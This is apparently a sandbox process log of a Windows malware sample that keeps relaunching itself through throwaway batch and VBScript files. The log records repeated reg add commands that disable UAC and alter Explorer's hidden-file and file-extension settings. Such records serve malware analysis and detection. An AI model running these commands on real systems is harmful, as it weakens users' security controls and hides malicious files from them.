C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LwIcUYUo.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:4216
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2896

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WwoEYcsU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1020
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1184
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:5016
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:3428

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FesIUgQs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1176
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yuYosEQQ.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:400
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qsEgQsYA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:3772
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:2872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4876

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WacIcQUs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4824
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:4976
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:4200
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:3772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1332

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:2032
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgYoYQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:5036
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1020
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\esgUEAgY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:1236
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2896
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:1208

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2868
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3308
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:4744
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:3940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:400

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4680

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SQwQEsMw.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4860
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:412

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgoIEkwA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uQMEYUoY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2288
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1584
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1592
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4216
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1188
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PWokIEkU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1696
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3132
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1484
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:5064

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EycQAYMo.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DOkUQIkw.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4372
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:4204
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:3112
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4300

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:2660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:4876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\byoUIwAs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:468
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4508

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:3880
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:4856

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:1768
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies registry key
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgwIYgoQ.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:468

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:456
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OYYsAwwI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1768

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4316

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:4692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JAMkccYA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yKUgMUQE.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1544
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - Modifies registry key
  PID:752
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:3880
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4084
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:232

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:764

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FgYQEoEc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4588

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:2132

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3628
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:1332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:4860

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkwkUIQM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOQkIkoc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:400
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:1236
    - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
        
        C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
        5⤵
        
        PID:4084
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:1344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4868
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1060
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1068
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:2012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SagcskUs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:1768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:5080

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies registry key
PID:4216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:3976

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4608
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QCkAUMUM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:5064

C:\Windows\SysWOW64\reg.exe
